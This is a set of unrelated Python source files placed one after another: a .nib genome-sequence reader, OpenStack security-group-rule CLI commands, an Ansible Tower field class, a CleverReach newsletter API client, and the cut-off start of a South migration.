def get_nib_seq(nib,start=0,end=-1,strand='+',mask=NOMASK) :
'''Extract subsequence from .nib file like Jim Kent's nibFrag utility.
Default behavior is to return the entire sequence.
Extract the nucleotide substring defined by the closed interval [start,end]
from the sequence found in *nib*. The *mask* parameter has the following
possible values:
chipsequtil.nib.NOMASK -- masked positions are not indicated (default)
chipsequtil.nib.MASK -- masked positions are capitalized, normal bases lower case
chipsequtil.nib.HARDMASK -- masked positions are replaced with Ns
'''
return get_nib_seq_batch(nib,[(start,end,strand)],mask)[0]
def get_nib_header(nib,start=0,end=-1,strand='+',name=None,dbHeader=None,tbaHeader=None) :
'''Method for constructing fasta headers compliant with nibFrag utility'''
headers = get_nib_header_batch(nib,[(start,end,strand,name,dbHeader,tbaHeader),])
return headers[0]
def get_nib_header_batch(nib,queries) :
'''Batch method for creating nibFrag headers. *queries* is a list of at most
6-tuples (start,end,strand,name,dbHeader,tbaHeader) representing queries as
specified by the original nibFrag utility. Only start, end, and strand
fields are required.'''
nib_path, nib_f = _nib_fd(nib)
nib_dir,nib_fn,nib_base,nib_ext = get_file_parts(nib_path)
nbases = validate_nib_file(nib)
headers = []
header_tmpl = '>%(name)s%(db)s\n'
for rec in queries :
# set some defaults if they are not supplied
rec = list(rec)
rec.extend([None]*(6-len(rec)))
start, end, strand, name, dbHeader, tbaHeader = rec
if end == -1 :
end = nbases
fields = {}
fields['name'] = nib_path+':%d-%d'%(start,end) if not name else name
fields['db'] = ''
if tbaHeader :
# ignored for some reason in nibFrag when tbaHeader supplied and dbHeader is not
fields['name'] = '' if not dbHeader else fields['name']
fields['db'] = '%s.%s:%d-%d of %d'%(tbaHeader,nib_base,start,end,nbases)
if dbHeader :
fields['db'] = ':%s.%s:%d-%d:%s:%d'%(dbHeader,nib_base,start,end,strand,nbases)
headers.append(header_tmpl%fields)
return headers
def validate_nib_file(nib) :
'''Validate .nib file header, returning number of bases indicated if successful.
*nib* argument is either a filename or an open file object.
'''
nib_fn, nib_f = _nib_fd(nib)
# first 4 bytes are a nib file signature
#TODO - consider attempting to figure out byte order to make truly cross platform
def_sig = 0x6BE93D3A
sig = struct.unpack('=l',nib_f.read(4))[0]
if def_sig != sig :
raise NibException('Invalid nib file signature in %s, found %s, expected \
%s, perhaps the .nib file was not created on this platform?\n\nnibFrag style \
error: %s is not a good .nib file.'%(nib_fn,hex(sig),hex(def_sig),nib_fn))
# second 4 bytes are number of bases in sequence
nbases = struct.unpack('=l',nib_f.read(4))[0]
return nbases
def get_nib_seq_batch(nib,queries,mask=NOMASK) :
'''Extract subsequence from .nib file like Jim Kent's nibFrag utility.
Extract the nucleotide substrings defined by the closed intervals in *queries*
from the sequence found in *nib*. *nib* argument is either a filename or
an open file object. Entries in *queries* are 3-tuples defining (start,end,strand)
sequence coordinates. Sequences are returned in order in a list as
strings. *mask* parameter has the following possible values:
chipsequtil.nib.NOMASK -- masked positions are not indicated (default)
chipsequtil.nib.MASK -- masked positions are capitalized, normal bases lower case
chipsequtil.nib.HARDMASK -- masked positions are replaced with Ns
'''
nib_fn, nib_f = _nib_fd(nib)
nbases = validate_nib_file(nib_f)
# rest of file is sequence, with each nibble (4 bits) encoding a base as
# follows (from http://genome.ucsc.edu/FAQ/FAQformat.html#format8) :
#
# 0 - T
# 1 - C
# 2 - A
# 3 - G
# 4 - N
#
# The most significant bit in a nibble is set if the base is masked
trans_nuc = 'tcagn'
# start translating the nibbles into nucleotides
def trans_nib(nib) :
nuc = trans_nuc[nib&7]
mask_bit = nib & 8
if mask in [MASK,HARDMASK] and mask_bit == 0 :
return nuc.upper()
if mask == HARDMASK and mask_bit != 0 :
return 'N'
return nuc
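# Worked example (added comment, not from the original source): the byte
# 0x19 is 0001 1001 in binary. Its high nibble 0x1 maps to base 'c' with the
# mask bit clear, so MASK/HARDMASK upper-case it to 'C'; its low nibble 0x9
# has the mask bit (8) set and base bits 1 -> 'c', which HARDMASK replaces
# with 'N'.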
headers = [] # stores headers
seqs = [] # stores sequences
# sort the coords so we can walk most efficiently through the file
queries.sort()
for start, end, strand in queries :
if start < 0 :
raise NibException('Received negative start coordinate, this may '\
'indicate a region on mitochondrial DNA that '\
'spans reference sequence start and end. This '\
'utility cannot handle these cases, aborting. '\
'Requested interval: %s (%d,%d)'%(nib_fn,start,end))
start, end = map(int,(start,end))
# end == -1 means caller wants entire sequence
if end == -1 :
end = nbases
if any([nbases < c for c in [start,end]]) :
raise NibException(('Requested slice (%(start)d,%(end)d) not compatible ' \
'with sequence of length %(nbases)d in %(nib_fn)s, aborting\n\nnibFrag '\
'style error: nib read past end of file (%(start)d %(end)d) in file: '\
'%(nib_fn)s')%{'start':start,'end':end,'nbases':nbases,'nib_fn':nib_fn})
# figure out how many bytes to read through
start_byte,rem_byte = start/2,start%2
# calculate where we need to move to in the file from the current location
# + 8 is from the 2*4 bytes header info in the .nib format
byte_offset = start_byte-nib_f.tell() + 8
nib_f.seek(byte_offset,1) # seek forward to the beginning byte from current location
seq_bytes,seq_rem_byte = int(math.ceil((end-start+rem_byte)/2.)),(end+1)%2
seq_bytes = nib_f.read(seq_bytes+seq_rem_byte)
# start translating the bytes
seq = StringIO() # we use StringIO because it is more efficient than concatenating strings
for c in seq_bytes :
c_byte = struct.unpack('=b',c)[0]
# higher nibble
c_nib = (c_byte & (15<<4))>>4
nuc = trans_nib(c_nib)
seq.write(nuc)
# lower nibble
c_nib = int(c_byte) & 15
nuc = trans_nib(c_nib)
seq.write(nuc)
# final nucleotide sequence
seq_str = seq.getvalue()
# if we're reading to the end, don't clip anything
if end != nbases :
# if the coordinate requested was not on a byte boundary, adjust
if rem_byte == 1 :
seq_str = seq_str[1:]
if seq_rem_byte == 1 :
seq_str = seq_str[:-1]
# nibFrag apparently uses zero-based indexing, clip off one base
seq_str = seq_str[:-1]
seq.close()
# adjust strand
if strand == '-' :
seq_str = reverse_complement(seq_str)
seqs.append(seq_str)
return seqs
class SeqDBException(Exception): pass
class NibDBException(Exception): pass
class SeqDB(object) :
'''Base class for different kinds of sequence databases. Does nothing by
itself; implement subclasses. Constructor provides _db_map and db_info class members.'''
def __init__(self) :
self._db_map = {}
self.db_info = dd(dict)
def get_seq(self,*args, **kwargs) :
raise SeqDBException('Base class SeqDB has no get_seq implementation')
class NibDB(SeqDB) :
'''Class providing an interface to a set of .nib files as created by faToNib
in Jim Kent's software suite.
Sequences are identified by the basename of the .nib file without the .nib
extension, e.g. chr1.nib is identified as chr1.
Some potentially useful information about the entries in the database is
stored in the *db_info* dictionary.
'''
def __init__(self,nib_fns=[],nib_dirs=[]) :
'''*nib_fns* is a list of paths to specific .nib files desired for the
NibDB. *nib_dirs* is a list of paths to directories containing .nib
files such that every .nib file in the directories is added to the NibDB.
Explicitly passed files take precedence over those found in directories
when sequence names collide.
'''
SeqDB.__init__(self)
# find all *.nib files in the directories passed
if isinstance(nib_dirs,str) : # user just provided single directory
nib_dirs = [nib_dirs]
dir_nibs = []
for d in nib_dirs :
dir_nibs.extend(glob.glob(os.path.join(d,'*.nib')))
if isinstance(nib_fns,str) :
nib_fns = [nib_fns]
# for each .nib found, add to db
# if there is a collision of names, those specified in files (not dirs)
# take precedence without warning
for fn in dir_nibs+nib_fns :
# open the nib file
nib_path,nib_fn,nib_base,nib_ext = get_file_parts(fn)
fn, nib_f = _nib_fd(fn)
self._db_map[nib_base] = nib_f
# store some info
self.db_info[nib_base]['path'] = fn
nbases = validate_nib_file(self._db_map[nib_base])
self.db_info[nib_base]['nbases'] = nbases
def __del__(self) :
'''import this
...Explicit is better than implicit...
'''
for nib_f in self._db_map.values() :
nib_f.close()
def _get_db_map(self,name) :
'''Gets appropriate file handle for the requested name, raises NibDBException
if it cannot be found'''
try :
return self._db_map[name]
except KeyError :
raise NibDBException('Sequence name %s not found in NibDB'%name)
def get_fasta(self,name,start=0,end=-1,strand='+',mask=NOMASK) :
'''Get the fasta record for the specified arguments, returns (header,sequence)
tuple.'''
nib_f = self._get_db_map(name)
return get_nib(nib_f,start,end,strand,mask)
def get_fasta_batch(self,recs,mask=NOMASK) :
'''Batch version of *get_fasta* method. *recs* is a list of lists/tuples
with (<chromo>,<start>,<end>,<strand>). Returns list of (header,sequence)
tuples in the same sequence as the input records.'''
# gather the records for each chromosome together
chrom_recs = dd(list)
for i,r in enumerate(recs) :
chrom_recs[r[0]].append((i,r)) # recs are (index,<tuple>)
# extract sequences
all_chrom_recs = []
for chrom, rec_list in chrom_recs.items() :
# sorted lists make sequence extraction efficient
rec_list.sort(key=lambda x: x[1][1]) # recs are (index,<tuple>)
# separate indexes from records, extract for this chromo
indexes, c_recs = zip(*rec_list)
# get_nib_batch requires list of (<start>,<end>,<strand>) tuples, remove
# chromo in first position
c_recs = [r[1:] for r in c_recs]
nib_f = self._get_db_map(chrom)
headers, seqs = get_nib_batch(nib_f,c_recs,mask)
# return the sequences to a (index,(header,sequence)) list
all_chrom_recs.extend(zip(indexes,zip(headers,seqs)))
# put the sequences back in the original order
all_chrom_recs.sort(key=lambda x: x[0]) # recs are (index,<tuple>) again
indexes, recs = zip(*all_chrom_recs)
return zip(*recs)
def get_fasta_from_bed(self,bed,mask=NOMASK) :
'''Accepts either a chipsequtil.BEDFile instance or a filename for a BED
file (used to construct a BEDFile instance) and returns the fasta
records for all records in order.'''
# determine if *bed* is a filename or a BEDFile
if isinstance(bed,str) : # filename
bed = BEDFile(bed)
# construct the records
recs = []
for rec in bed :
if rec['chrom'].lower().startswith('track') : # track line, skip
continue
recs.append((rec['chrom'],int(rec['chromStart']),int(rec['chromEnd']),rec['strand']))
return self.get_fasta_batch(recs,mask)
def get_seq(self,name,start=0,end=-1,strand='+',mask=NOMASK) :
'''Extract sequence from sequence *name*. Other arguments are passed
directly to *get_nib_seq* function.'''
nib_f = self._get_db_map(name)
return get_nib_seq(nib_f,start,end,strand,mask)
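# Hedged usage sketch (not part of the original module): how a caller might
# pull sequence out of a directory of .nib files with NibDB. The genome
# directory, chromosome name and coordinates below are placeholders.
if __name__ == '__main__' :
    db = NibDB(nib_dirs=['/data/genomes/hg19'])
    header, seq = db.get_fasta('chr1', start=1000, end=1050, strand='+', mask=MASK)
    sys.stdout.write(header)
    sys.stdout.write(seq + '\n')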
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""Security Group Rule action implementations"""
import argparse
import six
try:
from novaclient.v2 import security_group_rules as compute_secgroup_rules
except ImportError:
from novaclient.v1_1 import security_group_rules as compute_secgroup_rules
from openstackclient.common import exceptions
from openstackclient.common import parseractions
from openstackclient.common import utils
from openstackclient.i18n import _
from openstackclient.identity import common as identity_common
from openstackclient.network import common
from openstackclient.network import utils as network_utils
def _format_security_group_rule_show(obj):
data = network_utils.transform_compute_security_group_rule(obj)
return zip(*sorted(six.iteritems(data)))
def _format_network_port_range(rule):
# Display port range or ICMP type and code. For example:
# - ICMP type: 'type=3'
# - ICMP type and code: 'type=3:code=0'
# - ICMP code: Not supported
# - Matching port range: '443:443'
# - Different port range: '22:24'
# - Single port: '80:80'
# - No port range: ''
port_range = ''
if _is_icmp_protocol(rule.protocol):
if rule.port_range_min:
port_range += 'type=' + str(rule.port_range_min)
if rule.port_range_max:
port_range += ':code=' + str(rule.port_range_max)
elif rule.port_range_min or rule.port_range_max:
port_range_min = str(rule.port_range_min)
port_range_max = str(rule.port_range_max)
if rule.port_range_min is None:
port_range_min = port_range_max
if rule.port_range_max is None:
port_range_max = port_range_min
port_range = port_range_min + ':' + port_range_max
return port_range
def _get_columns(item):
columns = list(item.keys())
if 'tenant_id' in columns:
columns.remove('tenant_id')
columns.append('project_id')
return tuple(sorted(columns))
def _convert_to_lowercase(string):
return string.lower()
def _is_icmp_protocol(protocol):
# NOTE(rtheis): Neutron has deprecated protocol icmpv6.
# However, while the OSC CLI doesn't document the protocol,
# the code must still handle it. In addition, handle both
# protocol names and numbers.
if protocol in ['icmp', 'icmpv6', 'ipv6-icmp', '1', '58']:
return True
else:
return False
class CreateSecurityGroupRule(common.NetworkAndComputeShowOne):
"""Create a new security group rule"""
def update_parser_common(self, parser):
parser.add_argument(
'group',
metavar='<group>',
help=_("Create rule in this security group (name or ID)")
)
source_group = parser.add_mutually_exclusive_group()
source_group.add_argument(
"--src-ip",
metavar="<ip-address>",
help=_("Source IP address block (may use CIDR notation; "
"default for IPv4 rule: 0.0.0.0/0)")
)
source_group.add_argument(
"--src-group",
metavar="<group>",
help=_("Source security group (name or ID)")
)
return parser
def update_parser_network(self, parser):
parser.add_argument(
'--dst-port',
metavar='<port-range>',
action=parseractions.RangeAction,
help=_("Destination port, may be a single port or a starting and "
"ending port range: 137:139. Required for IP protocols TCP "
"and UDP. Ignored for ICMP IP protocols.")
)
parser.add_argument(
'--icmp-type',
metavar='<icmp-type>',
type=int,
help=_("ICMP type for ICMP IP protocols")
)
parser.add_argument(
'--icmp-code',
metavar='<icmp-code>',
type=int,
help=_("ICMP code for ICMP IP protocols")
)
# NOTE(rtheis): Support either protocol option name for now.
# However, consider deprecating and then removing --proto in
# a future release.
protocol_group = parser.add_mutually_exclusive_group()
protocol_group.add_argument(
'--protocol',
metavar='<protocol>',
type=_convert_to_lowercase,
help=_("IP protocol (ah, dccp, egp, esp, gre, icmp, igmp, "
"ipv6-encap, ipv6-frag, ipv6-icmp, ipv6-nonxt, "
"ipv6-opts, ipv6-route, ospf, pgm, rsvp, sctp, tcp, "
"udp, udplite, vrrp and integer representations [0-255]; "
"default: tcp)")
)
protocol_group.add_argument(
'--proto',
metavar='<proto>',
type=_convert_to_lowercase,
help=argparse.SUPPRESS
)
direction_group = parser.add_mutually_exclusive_group()
direction_group.add_argument(
'--ingress',
action='store_true',
help=_("Rule applies to incoming network traffic (default)")
)
direction_group.add_argument(
'--egress',
action='store_true',
help=_("Rule applies to outgoing network traffic")
)
parser.add_argument(
'--ethertype',
metavar='<ethertype>',
choices=['IPv4', 'IPv6'],
help=_("Ethertype of network traffic "
"(IPv4, IPv6; default: based on IP protocol)")
)
parser.add_argument(
'--project',
metavar='<project>',
help=_("Owner's project (name or ID)")
)
identity_common.add_project_domain_option_to_parser(parser)
return parser
def update_parser_compute(self, parser):
parser.add_argument(
'--dst-port',
metavar='<port-range>',
default=(0, 0),
action=parseractions.RangeAction,
help=_("Destination port, may be a single port or a starting and "
"ending port range: 137:139. Required for IP protocols TCP "
"and UDP. Ignored for ICMP IP protocols.")
)
# NOTE(rtheis): Support either protocol option name for now.
# However, consider deprecating and then removing --proto in
# a future release.
protocol_group = parser.add_mutually_exclusive_group()
protocol_group.add_argument(
'--protocol',
metavar='<protocol>',
choices=['icmp', 'tcp', 'udp'],
type=_convert_to_lowercase,
help=_("IP protocol (icmp, tcp, udp; default: tcp)")
)
protocol_group.add_argument(
'--proto',
metavar='<proto>',
choices=['icmp', 'tcp', 'udp'],
type=_convert_to_lowercase,
help=argparse.SUPPRESS
)
return parser
def _get_protocol(self, parsed_args):
protocol = 'tcp'
if parsed_args.protocol is not None:
protocol = parsed_args.protocol
if parsed_args.proto is not None:
protocol = parsed_args.proto
return protocol
def _is_ipv6_protocol(self, protocol):
# NOTE(rtheis): Neutron has deprecated protocol icmpv6.
# However, while the OSC CLI doesn't document the protocol,
# the code must still handle it. In addition, handle both
# protocol names and numbers.
if (protocol.startswith('ipv6-') or
protocol in ['icmpv6', '41', '43', '44', '58', '59', '60']):
return True
else:
return False
def take_action_network(self, client, parsed_args):
# Get the security group ID to hold the rule.
security_group_id = client.find_security_group(
parsed_args.group,
ignore_missing=False
).id
# Build the create attributes.
attrs = {}
attrs['protocol'] = self._get_protocol(parsed_args)
# NOTE(rtheis): A direction must be specified and ingress
# is the default.
if parsed_args.ingress or not parsed_args.egress:
attrs['direction'] = 'ingress'
if parsed_args.egress:
attrs['direction'] = 'egress'
# NOTE(rtheis): Use ethertype specified else default based
# on IP protocol.
if parsed_args.ethertype:
attrs['ethertype'] = parsed_args.ethertype
elif self._is_ipv6_protocol(attrs['protocol']):
attrs['ethertype'] = 'IPv6'
else:
attrs['ethertype'] = 'IPv4'
# NOTE(rtheis): Validate the port range and ICMP type and code.
# It would be ideal if argparse could do this.
if parsed_args.dst_port and (parsed_args.icmp_type or
parsed_args.icmp_code):
msg = _('Argument --dst-port not allowed with arguments '
'--icmp-type and --icmp-code')
raise exceptions.CommandError(msg)
if parsed_args.icmp_type is None and parsed_args.icmp_code is not None:
msg = _('Argument --icmp-type required with argument --icmp-code')
raise exceptions.CommandError(msg)
is_icmp_protocol = _is_icmp_protocol(attrs['protocol'])
if not is_icmp_protocol and (parsed_args.icmp_type or
parsed_args.icmp_code):
msg = _('ICMP IP protocol required with arguments '
'--icmp-type and --icmp-code')
raise exceptions.CommandError(msg)
# NOTE(rtheis): For backwards compatibility, continue ignoring
# the destination port range when an ICMP IP protocol is specified.
if parsed_args.dst_port and not is_icmp_protocol:
attrs['port_range_min'] = parsed_args.dst_port[0]
attrs['port_range_max'] = parsed_args.dst_port[1]
if parsed_args.icmp_type:
attrs['port_range_min'] = parsed_args.icmp_type
if parsed_args.icmp_code:
attrs['port_range_max'] = parsed_args.icmp_code
if parsed_args.src_group is not None:
attrs['remote_group_id'] = client.find_security_group(
parsed_args.src_group,
ignore_missing=False
).id
elif parsed_args.src_ip is not None:
attrs['remote_ip_prefix'] = parsed_args.src_ip
elif attrs['ethertype'] == 'IPv4':
attrs['remote_ip_prefix'] = '0.0.0.0/0'
attrs['security_group_id'] = security_group_id
if parsed_args.project is not None:
identity_client = self.app.client_manager.identity
project_id = identity_common.find_project(
identity_client,
parsed_args.project,
parsed_args.project_domain,
).id
attrs['tenant_id'] = project_id
# Create and show the security group rule.
obj = client.create_security_group_rule(**attrs)
columns = _get_columns(obj)
data = utils.get_item_properties(obj, columns)
return (columns, data)
def take_action_compute(self, client, parsed_args):
group = utils.find_resource(
client.security_groups,
parsed_args.group,
)
protocol = self._get_protocol(parsed_args)
if protocol == 'icmp':
from_port, to_port = -1, -1
else:
from_port, to_port = parsed_args.dst_port
src_ip = None
if parsed_args.src_group is not None:
parsed_args.src_group = utils.find_resource(
client.security_groups,
parsed_args.src_group,
).id
if parsed_args.src_ip is not None:
src_ip = parsed_args.src_ip
else:
src_ip = '0.0.0.0/0'
obj = client.security_group_rules.create(
group.id,
protocol,
from_port,
to_port,
src_ip,
parsed_args.src_group,
)
return _format_security_group_rule_show(obj._info)
class DeleteSecurityGroupRule(common.NetworkAndComputeCommand):
"""Delete a security group rule"""
def update_parser_common(self, parser):
parser.add_argument(
'rule',
metavar='<rule>',
help=_("Security group rule to delete (ID only)")
)
return parser
def take_action_network(self, client, parsed_args):
obj = client.find_security_group_rule(parsed_args.rule)
client.delete_security_group_rule(obj)
def take_action_compute(self, client, parsed_args):
client.security_group_rules.delete(parsed_args.rule)
class ListSecurityGroupRule(common.NetworkAndComputeLister):
"""List security group rules"""
def update_parser_common(self, parser):
parser.add_argument(
'group',
metavar='<group>',
nargs='?',
help=_("List all rules in this security group (name or ID)")
)
return parser
def update_parser_network(self, parser):
# Accept but hide the argument for consistency with compute.
# Network will always return all projects for an admin.
parser.add_argument(
'--all-projects',
action='store_true',
default=False,
help=argparse.SUPPRESS
)
parser.add_argument(
'--long',
action='store_true',
default=False,
help=_("List additional fields in output")
)
return parser
def update_parser_compute(self, parser):
parser.add_argument(
'--all-projects',
action='store_true',
default=False,
help=_("Display information from all projects (admin only)")
)
# Accept but hide the argument for consistency with network.
# There are no additional fields to display at this time.
parser.add_argument(
'--long',
action='store_false',
default=False,
help=argparse.SUPPRESS
)
return parser
def _get_column_headers(self, parsed_args):
column_headers = (
'ID',
'IP Protocol',
'IP Range',
'Port Range',
)
if parsed_args.long:
column_headers = column_headers + ('Direction', 'Ethertype',)
column_headers = column_headers + ('Remote Security Group',)
if parsed_args.group is None:
column_headers = column_headers + ('Security Group',)
return column_headers
def take_action_network(self, client, parsed_args):
column_headers = self._get_column_headers(parsed_args)
columns = (
'id',
'protocol',
'remote_ip_prefix',
'port_range_min',
)
if parsed_args.long:
columns = columns + ('direction', 'ethertype',)
columns = columns + ('remote_group_id',)
# Get the security group rules using the requested query.
query = {}
if parsed_args.group is not None:
# NOTE(rtheis): Unfortunately, the security group resource
# does not contain security group rules resources. So use
# the security group ID in a query to get the resources.
security_group_id = client.find_security_group(
parsed_args.group,
ignore_missing=False
).id
query = {'security_group_id': security_group_id}
else:
columns = columns + ('security_group_id',)
rules = list(client.security_group_rules(**query))
# Reformat the rules to display a port range instead
# of just the port range minimum. This maintains
# output compatibility with compute.
for rule in rules:
rule.port_range_min = _format_network_port_range(rule)
return (column_headers,
(utils.get_item_properties(
s, columns,
) for s in rules))
def take_action_compute(self, client, parsed_args):
column_headers = self._get_column_headers(parsed_args)
columns = (
"ID",
"IP Protocol",
"IP Range",
"Port Range",
"Remote Security Group",
)
rules_to_list = []
if parsed_args.group is not None:
group = utils.find_resource(
client.security_groups,
parsed_args.group,
)
rules_to_list = group.rules
else:
columns = columns + ('parent_group_id',)
search = {'all_tenants': parsed_args.all_projects}
for group in client.security_groups.list(search_opts=search):
rules_to_list.extend(group.rules)
# NOTE(rtheis): Turn the raw rules into resources.
rules = []
for rule in rules_to_list:
rules.append(compute_secgroup_rules.SecurityGroupRule(
client.security_group_rules,
network_utils.transform_compute_security_group_rule(rule),
))
return (column_headers,
(utils.get_item_properties(
s, columns,
) for s in rules))
class ShowSecurityGroupRule(common.NetworkAndComputeShowOne):
"""Display security group rule details"""
def update_parser_common(self, parser):
parser.add_argument(
'rule',
metavar="<rule>",
help=_("Security group rule to display (ID only)")
)
return parser
def take_action_network(self, client, parsed_args):
obj = client.find_security_group_rule(parsed_args.rule,
ignore_missing=False)
columns = _get_columns(obj)
data = utils.get_item_properties(obj, columns)
return (columns, data)
def take_action_compute(self, client, parsed_args):
# NOTE(rtheis): Unfortunately, compute does not have an API
# to get or list security group rules so parse through the
# security groups to find all accessible rules in search of
# the requested rule.
obj = None
security_group_rules = []
for security_group in client.security_groups.list():
security_group_rules.extend(security_group.rules)
for security_group_rule in security_group_rules:
if parsed_args.rule == str(security_group_rule.get('id')):
obj = security_group_rule
break
if obj is None:
msg = _("Could not find security group rule with ID ") + \
parsed_args.rule
raise exceptions.CommandError(msg)
# NOTE(rtheis): Format security group rule
return _format_security_group_rule_show(obj)
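# Hedged CLI usage sketch (not part of the original module): typical
# invocations that map onto the classes above. Exact command names depend on
# how the plugin is registered; the group name and rule ID are placeholders.
#
#   openstack security group rule create --protocol tcp --dst-port 22:22 \
#       --src-ip 203.0.113.0/24 my-group
#   openstack security group rule list my-group --long
#   openstack security group rule show <rule-id>
#   openstack security group rule delete <rule-id>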
|
# Copyright 2015, Ansible, Inc.
# Luke Sneeringer <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import six
_field_counter = 0
class Field(object):
"""A class representing flags on a given field on a model.
This class tracks whether a field is unique, filterable, read-only, etc.
"""
def __init__(self, key=None, type=six.text_type, default=None,
display=True, filterable=True, help_text=None,
is_option=True, password=False, read_only=False,
required=True, show_default=False, unique=False,
multiple=False):
# Init the name to blank.
# What's going on here: This is set by the ResourceMeta metaclass
# when the **resource** is instantiated.
# Essentially, in any normal situation, it's safe to expect it
# to be set and non-empty.
self.name = ''
# Save properties of this field.
self.key = key
self.type = type
self.display = display
self.default = default
self.help_text = help_text
self.is_option = is_option
self.filterable = filterable
self.password = password
self.read_only = read_only
self.required = required
self.show_default = show_default
self.unique = unique
self.multiple = multiple
self.no_lookup = False
# If this is a password, display is always off.
if self.password:
self.display = False
# Track the creation history of each field, for sorting reasons.
global _field_counter
self.number = _field_counter
_field_counter += 1
def __lt__(self, other):
return self.number < other.number
def __gt__(self, other):
return self.number > other.number
def __repr__(self):
return '<Field: %s (%s)>' % (self.name, ', '.join(self.flags))
@property
def flags(self):
try:
flags_list = [self.type.__name__.replace('unicode', 'str')]
except AttributeError:
flags_list = [type(self.type).__name__.replace('unicode', 'str')]
if self.read_only:
flags_list.append('read-only')
if self.unique:
flags_list.append('unique')
if not self.filterable:
flags_list.append('not filterable')
if not self.required:
flags_list.append('not required')
return flags_list
@property
def help(self):
"""Return the help text that was passed to the constructor, or a
sensible default if none was provided.
"""
if self.help_text:
return self.help_text
return 'The %s field.' % self.name
@property
def option(self):
"""Return the field name as a bash option string
(e.g. "--field-name").
"""
return '--' + self.name.replace('_', '-')
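# Hedged usage sketch (not part of the original module): how a resource might
# declare fields and what the convenience properties return. The field names
# below are invented; in real use the name is set by the ResourceMeta
# metaclass rather than by hand.
if __name__ == '__main__':
    name = Field(unique=True, help_text='The name of the credential.')
    name.name = 'name'
    team = Field(type=int, required=False)
    team.name = 'team'
    print(name.option)            # --name
    print(name.help)              # The name of the credential.
    print(team.flags)             # ['int', 'not required']
    print(sorted([team, name]))   # fields sort back into declaration order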
|
# coding: utf-8
"""
You have to define a group (in the cleverreach admin panel) for each language.
The form code is optional; we use the first form if it is not provided.
The Cleverreach API requires suds: https://fedorahosted.org/suds/
You have to define the following parameters in your settings.py:
CLEVERREACH = {'api_key': '<API KEY>',}
API documentation is at http://api.cleverreach.com/soap/doc/5.0/
"""
import logging
from django.conf import settings
from suds.client import Client as SudsClient
from suds import WebFault
from cleverreach import CleverreachAPIException
logger = logging.getLogger('cleverreach.api')
URL = 'http://api.cleverreach.com/soap/interface_v5.1.php?wsdl'
API_KEY = settings.CLEVERREACH.get('api_key')
class Client(object):
def __init__(self):
self.soap = SudsClient(URL) #immediately opens up a connection.
self.raise_exceptions = settings.CLEVERREACH.get('raise_exceptions', True)
# TODO: dotted path helper
def query_data(self, method, *args, **kwargs):
try:
response = getattr(self.soap.service, method)(API_KEY, *args, **kwargs)
except WebFault as e:
if self.raise_exceptions:
raise e
else:
logger.error(e)
return None  # no response object exists when the SOAP call itself failed
else:
if response.status == "ERROR":
if self.raise_exceptions:
message = u'Error for method %s: %s. Data: %s' % \
(method, response.message, response.data)
raise CleverreachAPIException(message, response.statuscode)
else:
logger.error(response.message)
return response.data
# Client
# Group
def group_get_list(self):
"""
Returns a list of group classes of the form::
(group){
id = 108907
name = "test1"
last_mailing = 1335887342
last_changed = 1335886187
count = 84
inactive_count = 0
total_count = 84
}
The dict keys are actually object properties.
"""
return self.query_data('groupGetList')
def group_clear(self, list_id):
"""
Truncates the contents of the group.
Warning: This may have a heavy impact on statistics and campaigns,
since all related data (receivers, orders, events) will be removed.
"""
return self.query_data('groupClear', list_id)
# Forms
def forms_get_list(self, list_id):
"""
Returns a list of available forms for the given group.
Forms are object with the properties [id, name, description]
"""
return self.query_data('formsGetList', list_id)
def forms_get_code(self, form_id):
"""
Returns the HTML code for the given embedded form.
form_id -- the id of the form (not the list!)
"""
return self.query_data('formsGetCode', form_id)
def forms_activation_mail(self, form_id, email, doidata=None):
"""
Will send the activation mail to the given email.
You will have to manually add the receiver first with "receiver.add"
or use an existing one.
If the user is already activated, the status will return an error.
"""
if not doidata:
doidata = {'user_ip': '127.0.0.1', 'user_agent': 'mozilla',
'referer': 'http://www.gotham.com/newsletter_subscribe/',
'postdata': 'firtsname:bruce,lastname:whayne,nickname:Batman',
'info': 'Extra info. the more you provide, the better.'}
return self.query_data('formsSendActivationMail', form_id, email, doidata)
# Mailing
# Receiver
def receiver_add(self, list_id, receiver):
"""
Adds a new single receiver
This function tries to add a single receiver.
If the receiver already exists, the operation will fail.
Use receiver_update in that case.
The default form only accepts email, registered, activated,
source and attributes.
To add more fields you have to add them as attributes. Make sure the keys
are the same as the name of the fields in the form. (Check with get_by_email)
Attribute keys may only contain lowercase a-z and 0-9.
"""
return self.query_data('receiverAdd', list_id, receiver)
def receiver_get_by_email(self, list_id, email, level=1):
"""
Gets user details based on the given readout level.
Possible levels (bitwise)::
000 (0) > Basic readout with (de)activation dates
001 (1) > including attributes (if available)
010 (2) > including Events (if available)
100 (4) > including Orders (if available)
"""
return self.query_data('receiverGetByEmail', list_id, email, level)
def receiver_set_active(self, list_id, email):
"""
Activates a given receiver/email
The receiver will receive mailings from the system again.
This sets/overwrites the activation date with the current date.
"""
return self.query_data('receiverSetActive', list_id, email)
def receiver_set_inactive(self, list_id, email):
"""
Deactivates a given receiver/email
The receiver won't receive any more mailings from the system.
This sets/overwrites the deactivation date with the current date.
"""
return self.query_data('receiverSetInactive', list_id, email)
def receiver_delete(self, list_id, email):
""" Deletes an email out of an group. """
return self.query_data('receiverDelete', list_id, email)
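# Hedged usage sketch (not part of the original module): subscribing a new
# receiver and sending the double-opt-in mail. The group and form are picked
# blindly from the API listings, the email address is a placeholder, and the
# receiver dict only uses keys mentioned in receiver_add's docstring. Django
# settings (CLEVERREACH) must be configured for this to run.
if __name__ == '__main__':
    client = Client()
    group = client.group_get_list()[0]
    form = client.forms_get_list(group.id)[0]
    client.receiver_add(group.id, {'email': '[email protected]', 'source': 'website'})
    client.forms_activation_mail(form.id, '[email protected]')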
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'Issue.is_public_suggestion'
